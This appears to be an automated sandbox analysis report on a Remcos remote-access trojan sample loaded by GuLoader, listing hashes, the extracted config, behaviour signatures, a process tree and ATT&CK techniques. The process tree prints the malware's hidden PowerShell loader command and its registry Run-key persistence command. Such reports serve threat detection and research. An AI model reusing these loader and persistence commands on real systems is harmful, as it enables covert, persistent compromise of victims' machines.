Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-04-2024 10:49

General

  • Target

    43319fa796c6b542426e4e853a26a12d9a1cd49687878484a5bae88d246600cb.exe

  • Size

    383KB

  • MD5

    23e67f856583bc4edbab6d66fb5d3519

  • SHA1

    335d696e7448570c632dc0b6f3aadfe69262d2ef

  • SHA256

    43319fa796c6b542426e4e853a26a12d9a1cd49687878484a5bae88d246600cb

  • SHA512

    893f81e5c0a8e64b4a2ab2edee73b7867255154191cd73ca9faddfc3c7c68454689dc3b297c7cf3bb51f14f3910fb9c0ff6f1ce5f1139961a8153e54c9868ffc

  • SSDEEP

    6144:HT4DtVpZI3UNWc3n5C3Tsc8XANjZ8S+ztjsNtsZ7X9/wkm8mKuUE2OCQpPAvFeVY:HTgYEztxwquUfNQZAvsl9pSTlDt

Malware Config

Extracted

Family

remcos

Botnet

Top

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    mqerms.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    alpwovnb-G3F5OR

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43319fa796c6b542426e4e853a26a12d9a1cd49687878484a5bae88d246600cb.exe
    "C:\Users\Admin\AppData\Local\Temp\43319fa796c6b542426e4e853a26a12d9a1cd49687878484a5bae88d246600cb.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Deserting=Get-Content 'C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\jebliksbilledes\Unrelative\Sikkativers\Regredieredes\Fastkurspolitikken.Vol';$teksthjden=$Deserting.SubString(61567,3);.$teksthjden($Deserting)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:3700
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1432
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Flerbrugerudgave% -windowstyle minimized $remontering=(Get-ItemProperty -Path 'HKCU:\Forklaringsmodellen\').Jeanna228;%Flerbrugerudgave% ($remontering)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4068
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Flerbrugerudgave% -windowstyle minimized $remontering=(Get-ItemProperty -Path 'HKCU:\Forklaringsmodellen\').Jeanna228;%Flerbrugerudgave% ($remontering)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:1104
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:700

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2yqykul0.yey.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\Venstremnd\Kontraktforhandling\Bosnian48\Oprindelsers\Jernindustriers16.War
        Filesize

        317KB

        MD5

        28f1c6b709a58427fc3ee47df638ed75

        SHA1

        bf77edc7db52ff80241230e47dddc8273d3fe645

        SHA256

        d91eed61446e903f869aef5a8cbb79838fb433c35a1395c7b4d73589cc9cb5ba

        SHA512

        d193d9053b9ab401a56e2c939e98c2ad6fa55dede94ca4a61e8fc71c5427b4c8ca29964efed314676b1ff578d5b1a6328944816dfd01164deb3d1405ce44add4

      • C:\Users\Admin\AppData\Local\tjurhane\fasciolidae\stinksvampen\jebliksbilledes\Unrelative\Sikkativers\Regredieredes\Fastkurspolitikken.Vol
        Filesize

        60KB

        MD5

        2a4c059165f67c3923409c13eb335f08

        SHA1

        327454ea9cef3b257a7a154bc75aa1dac1dc77d1

        SHA256

        f383eb80238916fd6c00c1513464f841fefb622aad04f345f4bc69f8a24aa8b1

        SHA512

        d1d1898f852d9fb3af766fea3e06ffefad91af0bc4d5652716103f6f2151118b5129d8c9707fcaf14d3e16654f7148163b80ec03a3e2a4bbb036575666392560

      • memory/1308-28-0x0000000007990000-0x0000000007F34000-memory.dmp
        Filesize

        5.6MB

      • memory/1308-7-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-6-0x0000000002B40000-0x0000000002B76000-memory.dmp
        Filesize

        216KB

      • memory/1308-10-0x0000000005200000-0x0000000005266000-memory.dmp
        Filesize

        408KB

      • memory/1308-30-0x00000000085C0000-0x0000000008C3A000-memory.dmp
        Filesize

        6.5MB

      • memory/1308-13-0x00000000053A0000-0x0000000005406000-memory.dmp
        Filesize

        408KB

      • memory/1308-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp
        Filesize

        3.3MB

      • memory/1308-22-0x0000000006150000-0x000000000616E000-memory.dmp
        Filesize

        120KB

      • memory/1308-23-0x0000000006540000-0x000000000658C000-memory.dmp
        Filesize

        304KB

      • memory/1308-24-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-25-0x0000000007340000-0x00000000073D6000-memory.dmp
        Filesize

        600KB

      • memory/1308-32-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-27-0x00000000066B0000-0x00000000066D2000-memory.dmp
        Filesize

        136KB

      • memory/1308-4-0x0000000073F20000-0x00000000746D0000-memory.dmp
        Filesize

        7.7MB

      • memory/1308-9-0x0000000005160000-0x0000000005182000-memory.dmp
        Filesize

        136KB

      • memory/1308-8-0x0000000005420000-0x0000000005A48000-memory.dmp
        Filesize

        6.2MB

      • memory/1308-26-0x0000000006660000-0x000000000667A000-memory.dmp
        Filesize

        104KB

      • memory/1308-5-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-34-0x0000000007660000-0x0000000007664000-memory.dmp
        Filesize

        16KB

      • memory/1308-36-0x0000000073F20000-0x00000000746D0000-memory.dmp
        Filesize

        7.7MB

      • memory/1308-37-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-38-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-39-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-40-0x0000000004DE0000-0x0000000004DF0000-memory.dmp
        Filesize

        64KB

      • memory/1308-41-0x0000000008C40000-0x000000000E6D9000-memory.dmp
        Filesize

        90.6MB

      • memory/1308-42-0x0000000077971000-0x0000000077A91000-memory.dmp
        Filesize

        1.1MB

      • memory/1308-52-0x0000000073F20000-0x00000000746D0000-memory.dmp
        Filesize

        7.7MB

      • memory/1432-49-0x0000000000F40000-0x0000000002194000-memory.dmp
        Filesize

        18.3MB

      • memory/1432-51-0x00000000021A0000-0x0000000007C39000-memory.dmp
        Filesize

        90.6MB